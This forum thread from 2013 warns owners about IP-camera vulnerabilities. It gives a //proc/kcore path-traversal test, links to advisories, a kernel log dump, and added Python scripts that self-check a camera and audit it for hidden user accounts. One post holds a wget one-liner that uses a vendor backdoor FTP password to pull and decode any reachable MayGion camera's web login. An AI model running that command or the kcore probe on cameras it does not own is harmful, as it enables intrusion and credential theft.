News:

Registered a URL and setup a forum as the IPCam stuff really needed its own site vs my irregular blog posts about IPCam hacking at http://www.computersolutions.cn/blog

Topic: New IP Camera Exploits You Need To Be Aware Of

March 12, 2013, 05:15:14 pm
Exploit for FI9820W/FI8608W cameras:

http://foscam.us/forum/important-make-sure-your-h-264-camera-has-latest-firmware-t3257-10.html?hilit=exploit#p18617

It should also be noted:

That many if not most MJPEG series IP Cameras, branded and non-branded, including clones, are currently exposed to this exploit without a firmware upgrade:

http://packetstormsecurity.com/files/120624/Foscam-Firmware-11.37.2.48-Path-Traversal.html

Because of this, if you find your camera exposed to this exploit, you should contact the seller and ask if they have a firmware update to resolve this issue.

Foscam does have firmware upgrades to resolve this exploit for the FI8903/4/5, FI8918 and FI8910, but NOT for the FI8908 series.

To test if your camera is exposed to this exploit, please do the following:

Legend

xxx.xxx.xxx.xxx = Local IP Address from within your local network or Your ISP IP Address or Your DDNS
#### = Port for camera

From any browser window enter (without any leading spaces. Note: the double forward slashes are required for this exploit and are not a mistake):

Code:
http://xxx.xxx.xxx.xxx:####//proc/kcore
If you see data displayed as a result, your camera is currently exposed to this exploit. A firmware upgrade IS required to change this.

Without any firmware upgrade, your camera configuration information, such as WiFi information as well as DDNS information, can/could be queried, in many if not most cases, without the need to use any User Id and Password for the camera. This may include data such as your WiFi Key, SSID, DDNS information, the DDNS password and other information stored in the camera's configuration data.

Don
« Last Edit: May 12, 2013, 08:08:03 pm by TheUberOverLord »
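A way to run the browser test above from a script against your own camera, added here as an example and not part of the post. It assumes only what the post states: an exposed camera answers the double-slash URL with data (kcore is an ELF core image, so the ELF magic is checked first), and it reads no more than the first 64 bytes rather than the whole file.

```python
"""Self-check for the MJPEG-series //proc/kcore path-traversal exposure."""
import sys
import urllib.request
from urllib.error import HTTPError, URLError

ELF_MAGIC = b"\x7fELF"   # /proc/kcore is served as an ELF core image


def build_probe_url(host: str, port: int) -> str:
    # The double slash after the port is the whole point of the test;
    # urllib does not normalise the path, so it reaches the camera unchanged.
    return f"http://{host}:{port}//proc/kcore"


def classify(status: int, first_bytes: bytes) -> str:
    """Map the HTTP status and the first bytes of the body to a verdict."""
    if status not in (200, 206):
        return "not exposed (HTTP %d)" % status
    if first_bytes.startswith(ELF_MAGIC):
        return "EXPOSED: /proc/kcore served without authentication"
    if first_bytes.lstrip().startswith(b"<"):
        # A login or error page with status 200 is not proof either way.
        return "unclear: an HTML page came back, inspect it manually"
    if first_bytes:
        return "EXPOSED: unauthenticated data returned for //proc/kcore"
    return "not exposed (empty body)"


def check_camera(host: str, port: int = 80, timeout: float = 5.0) -> str:
    """Fetch at most 64 bytes of the probe URL and classify the answer."""
    req = urllib.request.Request(build_probe_url(host, port),
                                 headers={"Range": "bytes=0-63"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read(64))
    except HTTPError as e:          # 401/403/404 etc. still carry a status
        return classify(e.code, b"")
    except (URLError, OSError) as e:
        return f"no answer from camera: {e}"


if __name__ == "__main__":
    # usage: python kcore_check.py <camera-ip> [port]
    cam_host = sys.argv[1]
    cam_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    print(check_camera(cam_host, cam_port))
```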

April 11, 2013, 08:25:25 pm
I've just checked my cheap eBay clone, and guess what? Pages and pages of data. Mostly gobbledygook, but I could make out stuff like user names and passwords, router IP address and so on. A few odd words as well, like Elf, nonce and shat! Weird!

Just as well it's going back tomorrow for a refund.

Pedro

April 11, 2013, 08:37:37 pm
Actually, it just got worse!

While, as an example, Foscam did release a firmware upgrade that resolved the issue about accessing this information without any login needed, I cannot say if other brands, models and clones did the same.

There is now a new published method to gain access to this data as an Operator User Level Id of the camera. Also, a toolkit was released to show others how to use this method and other newly published methods.

More here ("Note: Please review all the links below"):

Article: http://www.computerworld.com/s/article/9238329/Wireless_IP_cameras_open_to_hijacking_over_the_Internet_researchers_say

Author and Conference Presenters Blog Post: http://blog.shekyan.com/2013/03/hacking-ipcameras.html

Hack In The Box Conference Presentation Information used in the Presentation on April 11, 2013: http://conference.hitb.org/hitbsecconf2013ams/materials/D2T1%20-%20Sergey%20Shekyan%20and%20Artem%20Harutyunyan%20-%20Turning%20Your%20Surveillance%20Camera%20Against%20You.pdf

GetMeCamTool Toolkit Released: https://github.com/artemharutyunyan/getmecamtool

This was presented at the recent Hack In The Box Amsterdam convention as:

D2T1 - Sergey Shekyan and Artem Harutyunyan - Turning Your Surveillance Camera Against You

So, not only is this now out in the public domain again, there is a published toolkit that is command based, that can be used by virtually anyone to attempt to very easily abuse these exploits.

Just as one example, the toolkit supports replacing the Web UI ("Web User") interface with different .html for the User page, that shows how to hide the last User Id in the camera configuration, so that the last User Id of the 8 possible User Ids added to the camera does not display as being present, allowing someone who has exploited the camera to add and hide a User Id from the camera's owner and other Admin Level User Ids of the camera.

Of course, the .html in most cases would need to be altered to match what it looked like before, but it shows others how easy it is to add and hide a User Id for the camera.

It should be noted that you can still use the /get_params.cgi URL to see any and all User Ids that the camera has configured. But the standard camera interface that comes with the camera could in fact be used to hide one or more User Ids.

While none of the things the toolkit does are complicated or unknown to others here on how to do these same things using other methods, this toolkit makes it much easier for others to now do the same, with little or no knowledge about the cameras.

As stated, this published toolkit is command based and has many other capabilities once you gain Admin Level User Id access to the camera.

Don
 
« Last Edit: April 11, 2013, 09:18:33 pm by TheUberOverLord »
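A small audit to go with the /get_params.cgi point above, added here as an example and not code from the post or the toolkit. It assumes the MJPEG-series get_params.cgi response is a list of `var userN_name='...';` and `var userN_pri=N;` lines (an assumption; the sample below is constructed) and compares the accounts it reports against the names the Web UI user page shows, so a hidden slot stands out.

```python
"""Compare get_params.cgi user slots with what the camera's user page displays."""
import re

# Privilege values as assumed for the MJPEG-series CGI: 0 visitor, 1 operator, 2 admin
PRI_NAMES = {0: "visitor", 1: "operator", 2: "admin"}

# Constructed sample of a get_params.cgi response (not captured from a real camera);
# slot 8 is the kind of account a tampered user page could hide.
SAMPLE_PARAMS = """var id='000000000000';
var user1_name='admin';
var user1_pwd='';
var user1_pri=2;
var user2_name='viewer';
var user2_pri=0;
var user3_name='';
var user3_pri=0;
var user8_name='svc';
var user8_pri=1;
"""

_USER_RE = re.compile(r"var user(\d)_(name|pri)=('([^']*)'|(\d+));")


def list_users(params_text):
    """Return {slot: {'name': ..., 'pri': ...}} for every non-empty user slot."""
    slots = {}
    for m in _USER_RE.finditer(params_text):
        slot, field, _, sval, ival = m.groups()
        entry = slots.setdefault(int(slot), {"name": "", "pri": 0})
        if field == "name":
            entry["name"] = sval
        else:
            entry["pri"] = int(ival)
    return {s: e for s, e in slots.items() if e["name"]}


def hidden_users(params_text, names_shown_in_ui):
    """Accounts present in get_params.cgi but absent from the Web UI user page."""
    shown = set(names_shown_in_ui)
    return sorted((s, e["name"], PRI_NAMES.get(e["pri"], str(e["pri"])))
                  for s, e in list_users(params_text).items()
                  if e["name"] not in shown)


if __name__ == "__main__":
    # Replace SAMPLE_PARAMS with the text fetched (as admin) from the camera's
    # /get_params.cgi, and the list with the names the user page displays.
    for slot, name, pri in hidden_users(SAMPLE_PARAMS, ["admin", "viewer"]):
        print(f"slot {slot}: '{name}' ({pri}) is configured but not shown in the UI")
```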

April 11, 2013, 08:58:46 pm
Crikey!

Those links made for interesting reading. So much for going for a Foscam or Wansview; in fact I've now gone off the idea of an IP camera altogether!

Cheers

Pedro

April 14, 2013, 07:49:41 pm
Hi

Before I sent the camera back I decided to look a bit closer at the data produced by the exploit and found what looks very much like a kernel boot log and partial Romfs log, and not a serial lead and soldering iron in sight!

I wouldn't imagine it would help me discover what make/model of camera it's been cloned from, or for that matter any firmware/UI updates that would fix the exploit, but it's still interesting nonetheless.

See below, enjoy!

ELF(44 tx”CORE|CORERvmlinuxroot=/dev/rom0 rwhCORE@
Linux version 2.4.20-uc0 (root@maverick-linux) (gcc version 3.0) #1482 四 6月 16 01:00:08 CST 2011
Processor: Winbond W90N745 revision 1
Architecture: W90N745
On node 0 totalpages: 4096
zone(0): 0 pages.
zone(1): 4096 pages.
zone(2): 0 pages.
Kernel command line: root=/dev/rom0 rw
Calibrating delay loop... 39.83 BogoMIPS
Memory: 16MB = 16MB total
Memory: 14616KB available (1278K code, 206K data, 40K init)
Dentry cache hash table entries: 2048 (order: 2, 16384 bytes)
Inode cache hash table entries: 1024 (order: 1, 8192 bytes)
Mount-cache hash table entries: 512 (order: 0, 4096 bytes)
Buffer-cache hash table entries: 1024 (order: 0, 4096 bytes)
Page-cache hash table entries: 4096 (order: 2, 16384 bytes)
POSIX conformance testing by UNIFIX
Linux NET4.0 for Linux 2.4
Based upon Swansea University Computer Society NET3.039
Initializing RT netlink socket
Starting kswapd
PTZ Driver has been installed successfully.
Winbond W90N745 Serial driver version 1.0 (2005-08-15) with no serial options enabled
ttyS00 at 0xfff80000 (irq = 9) is a W90N745
Winbond W90N7451 Serial driver version 1.0 (2005-08-15) with no serial options enabled
ttyS00 at 0xfff80100 (irq = 10) is a W90N7451
I2C Bus Driver has been installed successfully.
Blkmem copyright 1998,1999 D. Jeff Dionne
Blkmem copyright 1998 Kenneth Albanowski
Blkmem 1 disk images:
0: 7F0E0000-7F1EC3FF [VIRTUAL 7F0E0000-7F1EC3FF] (RO)
S29GL032N Flash Detected
01 eth0 initial ok!
which:0
PPP generic driver version 2.4.2
Linux video capture interface: v1.00
Winbond Audio Driver v1.0 Initialization successfully.
usb.c: registered new driver hub
add a static ohci host controller device
: USB OHCI at membase 0xfff05000, IRQ 15
hc_alloc_ohci
usb-ohci.c: AMD756 erratum 4 workaround
hc_reset
usb.c: new USB bus registered, assigned bus number 1
hub.c: USB hub found
hub.c: 2 ports detected
usb.c: registered new driver audio
 audio.c: v1.0.0:USB Audio Class driver
usb.c: registered new driver serial
usbserial.c: USB Serial Driver core v1.4
rtusb init --->
usb.c: registered new driver rt2870
dvm usb cam driver 0.0.0.1 by Maverick Gao in 2010-8-3
usb.c: registered new driver dvm
dvm usb cam driver 0.1 for sonix288 by Maverick Gao in 2009-4-20
usb.c: registered new driver dvm usb cam driver for sonix288
NET4: Linux TCP/IP 1.0 for NET4.0
IP Protocols: ICMP, UDP, TCP
IP: routing cache hash table of 512 buckets, 4Kbytes
TCP: Hash tables configured (established 1024 bind 2048)
VFS: Mounted root (romfs filesystem) readonly.
Freeing init memory: 40K

ROMFS  ???

BINFMT_FLAT: bad magic/rev (0x74202d74, need 0x4)
BINFMT_FLAT: bad magic/rev (0x74202d74, need 0x4)
hub.c: connect-debounce failed, port 1 disabled
new USB device :80fcc004-fed740
hub.c: new USB device 1, assigned address 2
probing sonix288 usb camera ...
dvm camera registered as video0
p1[7]:1,j 3,config->bNumInterfaces:4
usbaudio: device 2 audiocontrol interface 2 has 1 input and 0 output AudioStreaming interfaces
usbaudio: valid input sample rate 16000
usbaudio: device 2 interface 3 altsetting 1: format 0x00000010 sratelo 16000 sratehi 16000 attributes 0x01
usbaudio: valid input sample rate 48000
usbaudio: device 2 interface 3 altsetting 2: format 0x00000010 sratelo 48000 sratehi 48000 attributes 0x01
usbaudio: registered dsp 14,35
usbaudio: constructing mixer for Terminal 3 type 0x0101
usbaudio: warning: found 1 of 0 logical channels.
usbaudio: assuming the channel found is the master channel (got a Philips camera?). Should be fine.
usbaudio: registered mixer 14,32
usb_audio_parsecontrol: usb_audio_state at 00ff3680
new USB device :80fcc404-fed740
hub.c: new USB device 2, assigned address 3
Wait for auto-negotiation complete...OK
100MB - FULL
video0 opened
unknown command
audio_dev.state not AU_STATE_RECORDING
wb_audio_start_record

May 07, 2013, 07:06:54 am
It is interesting nobody has mentioned the back door in the MayGion cameras. There are many public cameras you can connect to via FTP with the recovery password (the one listed on the MayGion site where it says "this is not a back door" even though it really is). You can then download the configuration file and base64 decode it to get the username and password for the web interface. One more reason why devices like these with closed-source firmware should never be trusted on a public network!

Here's a one liner for anyone running Linux (and maybe Mac) that will get the login details for any camera you can connect to on port 21:

Code:
wget --ftp-user=MayGion --ftp-password=maygion.com ftp://$IP//tmp/eye/app/cs.ini -O - | grep ui= | cut -b 4- | base64 -d


June 02, 2013, 08:42:58 pm
MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities:

http://www.exploit-db.com/exploits/25813/

Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities:

http://www.exploit-db.com/exploits/25815/

TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities

http://www.exploit-db.com/exploits/25812/

Don
« Last Edit: June 02, 2013, 09:12:04 pm by TheUberOverLord »

August 14, 2013, 12:42:12 pm
Foscam FI8620:

http://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions

Hikvision IP Cameras Multiple Vulnerabilities:

http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities

More here; the full current list of recent IP Camera vulnerabilities as of today:

http://www.coresecurity.com/grid/advisories

Don

« Last Edit: August 14, 2013, 01:04:23 pm by TheUberOverLord »

January 23, 2014, 06:21:27 pm
New bug found for Foscam MJPEG-based cameras using .54 system firmware.

It's potentially possible that other brands and clones using other system firmware versions are also vulnerable to this unauthorized access as well.

More here:

http://krebsonsecurity.com/2014/01/bug-exposes-ip-cameras-baby-monitors/

Don